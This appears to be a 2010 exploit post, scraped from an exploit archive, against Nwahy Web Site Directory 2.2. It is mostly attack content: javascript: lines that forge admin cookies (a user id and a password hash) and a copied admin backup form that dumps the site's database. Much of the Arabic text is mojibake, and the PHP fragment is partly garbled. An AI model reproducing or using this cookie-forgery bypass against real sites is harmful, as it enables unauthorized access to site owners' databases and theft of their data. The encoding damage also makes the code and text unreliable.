Nwahy Web Site Dir 2.2 Database Disclosure Exploit

🗓️ 25 Sep 2010 00:00:00Reported by indoushkaType
zdt🔗 0day.today👁 36 Views
Nwahy Web Site Directory 2.2 Database Disclosure Exploit by indoushka in 2010. JavaScript cookie exploit and potential SQL injection vulnerability in admin control panel backup feature
==================================================
Nwahy Web Site Dir 2.2 Database Disclosure Exploit
==================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor: http://www.nwahy.com/

# Date: 2010-07-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Contact : 00213771818860

# Home : www.sec4ever.net

# Dosrk : ÐŸÐ±Ð½Ð± Ð—Ð±Ð³Ð¶Ð—Ð®Ðª Ð—Ð±Ð—Ð¥ÐŸÐ—Ð¡ 2.2 Ð˜Ð¡Ð³ÐœÐ™ nwahy.com
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 

 1- javascript:document.cookie="userid=1;path=/";
 
 2- javascript:document.cookie="pass=hpl%5Dhgadjd21232f297a57a5a743894a0e4a801fc3;path=/";
 
 <form name='vbform2' method='post' action='http://localhost/dir/admincp/backup.php?x=save'>

<table class='xtable' width='100%' id='AutoNumber155'>

<tr>
<td width='100%' align='center' colspan='3' class='xtt'>ÐÐÐ© Ð´Ð£ÐžÐ™ Ð—ÐÐšÐ½Ð—Ð¨Ð½Ðµ Ð³Ð´ Ð®Ð—ÐªÐŸÐ™ Ð—Ð±Ð˜Ð½Ð—Ð´Ð—Ðš</td>
</tr>

<tr>
<td width="3%"  class='xtr' align='center'>#</td>
<td width="80%"  class='xtr' align='center'>Ð—Ð£Ð³ Ð—Ð±ÐœÐŸÐ¶Ð±</td>
<td width="17%"  class='xtr' align='center'>ÐªÐŸÐŸ Ð—Ð±Ð£ÐœÐ±Ð—Ðš</td>
</tr>
<form name='vbform2' method='post' action='backup.php?x=save'>

<table class='xtable' width='100%' id='AutoNumber155'>

<tr>
<td width='100%' align='center' colspan='3' class='xtt'>ÐÐÐ© Ð´Ð£ÐžÐ™ Ð—ÐÐšÐ½Ð—Ð¨Ð½Ðµ Ð³Ð´ Ð®Ð—ÐªÐŸÐ™ Ð—Ð±Ð˜Ð½Ð—Ð´Ð—Ðš</td>
</tr>

<tr>
<td width="3%"  class='xtr' align='center'>#</td>
<td width="80%"  class='xtr' align='center'>Ð—Ð£Ð³ Ð—Ð±ÐœÐŸÐ¶Ð±</td>
<td width="17%"  class='xtr' align='center'>ÐªÐŸÐŸ Ð—Ð±Ð£ÐœÐ±Ð—Ðš</td>
</tr>

<?php
$tables = mysql_query("show tables from $dbname");
$num_tables = mysql_num_rows($tables);
if($num_tables == 0)
{
echo "Ð±Ð— Ð½Ð¶ÐœÐŸ ÐœÐŸÐ—Ð¶Ð± ÐÐ½ Ð®Ð—ÐªÐŸÐ™ Ð—Ð±Ð˜Ð½Ð—Ð´Ð—Ðš Ð—Ð±Ð³ÐÐŸÐŸÐµ";
exit;
}
$i = 0;
while($i < $num_tables)
{
$table = mysql_tablename($tables, $i);
$RowNum = mysql_query("select * from ".$table);
$RowTotal = mysql_num_rows($RowNum);
echo "<tr>
<td class='xtd' align='center'><input ID='" .$table . "1' type='checkbox' name='" .$table . "' value='1' /></td>
<td class='xtd'><LABEL id='" .$table . "' FOR='" .$table . "1'>" .$table . "</LABEL></td>
<td class='xtd' align='center'>$RowTotal</td>
</tr>\r\n";
$i++;
}

echo "<tr>
<td width='100%' colspan='3' class='xtr'><input ID='x1' checked type='checkbox' name='drop' value='1' dir='rtl' /> <LABEL FOR='x1'>Ð•Ð¦Ð—ÐÐ™ ÐÐ Ð Ð—Ð±ÐœÐŸÐ¶Ð± Ð•Ð Ð— Ð¯Ð—Ð´ Ð³Ð¶ÐœÐ¶ÐŸÐ—Ñ€ ÐÐ½ Ð—Ð±Ð˜ÐŸÐ—Ð½Ð™</LABEL></td>
</tr>

<tr>
<td width='100%' colspan='3' class='xtr'><input ID='x2' type='checkbox' name='zipfile' value='1' dir='rtl' /> <LABEL FOR='x2'>Ð—Ð±Ð¦Ð«Ð¨ Zipped</LABEL></td>
</tr>

<tr>
<td width='100%' align='center' colspan='3' class='xtr'><input class='addsubmit' type='submit' value=' ÐšÐ´ÐÐ½Ð¬Ð¬Ð  ' /></td>
</tr>

</table>
</form>";
echo $f;
}
?>

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2018-04-03]  #
25 Sep 2010 00:00Current
7.1High risk
Vulners AI Score7.1